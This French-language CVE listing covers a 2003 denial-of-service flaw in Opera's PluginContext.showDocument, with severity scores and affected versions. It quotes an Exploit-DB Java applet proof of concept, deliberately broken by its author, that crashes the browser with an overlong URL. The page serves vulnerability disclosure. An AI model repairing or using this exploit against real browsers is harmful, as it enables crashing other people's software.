Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Descriptions du CVE
The PluginContext object of Opera 6.05 and 7.0 allows remote attackers to cause a denial of service (crash) via an HTTP request containing a long string that gets passed to the ShowDocument method.
Informations du CVE
Faiblesses connexes
| Nom de la faiblesse | Source | |
|---|---|---|
| Improper Restriction of Operations within the Bounds of a Memory Buffer The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer's intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data. |
Métriques
| Métriques | Score | Gravité | CVSS Vecteur | Source |
|---|---|---|---|---|
| V2 | 4.3 | AV:N/AC:M/Au:N/C:N/I:N/A:P | nvd@nist.gov |
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Informations sur l'Exploit
Exploit Database EDB-ID : 22240
Date de publication : 2003-01-12 23h00 +00:00
Auteur : Marc Schoenefeld
EDB Vérifié : Yes
source: https://www.securityfocus.com/bid/6814/info
Opera ships with a trusted Java class ('opera.PluginContext') that includes a native method that is reportedly prone to denial of service attacks. It is possible for a malicious Java applet to trigger this condition to cause a denial of service. This issue was reported in versions of Opera for Microsoft Windows operating systems. It is not known if other platforms are also affected. Java support must enabled for this issue to be present and can be disabled to prevent attacks.
//Marc Schoenefeld 1/13/2003, www.illegalaccess.org
//not runnable, a little crippled, there are couple of obvious syntax errors
to avoid script-kidding
...
import opera.PluginContext; // !! import the vulnerable class
...
public class OperaCall2 extends App1et
{
- -
- - public OperaCall2()
- - {
- - }
- -
- - public void paint(Graphics g)
- - {
- - PluginContext plugincontext = new PluginContext(l);
- - try
- - {
- - plugincontext.showDocument(new URL("http://xxx.xxx" + new
String(new byte[30000])));
- - }
- - catch(Exception exception)
- - {
- - exception.printStackTrace();
- - }
- - }
}
Products Mentioned
Configuraton 0
Opera>>Opera_browser >> Version 6.05
- Opera>>Opera_browser >> Version 6.05 (Open CPE detail)
Opera>>Opera_browser >> Version 7.0
- Opera>>Opera_browser >> Version 7.0 (Open CPE detail)
- Opera>>Opera_browser >> Version 7.0 (Open CPE detail)
- Opera>>Opera_browser >> Version 7.0 (Open CPE detail)
- Opera>>Opera_browser >> Version 7.0 (Open CPE detail)
Opera>>Opera_browser >> Version 7.0
- Opera>>Opera_browser >> Version 7.0 (Open CPE detail)
Opera>>Opera_browser >> Version 7.0
- Opera>>Opera_browser >> Version 7.0 (Open CPE detail)
Opera>>Opera_browser >> Version 7.0
- Opera>>Opera_browser >> Version 7.0 (Open CPE detail)
Opera>>Opera_browser >> Version 7.01
- Opera>>Opera_browser >> Version 7.01 (Open CPE detail)
Références
2025©
tesweb SA
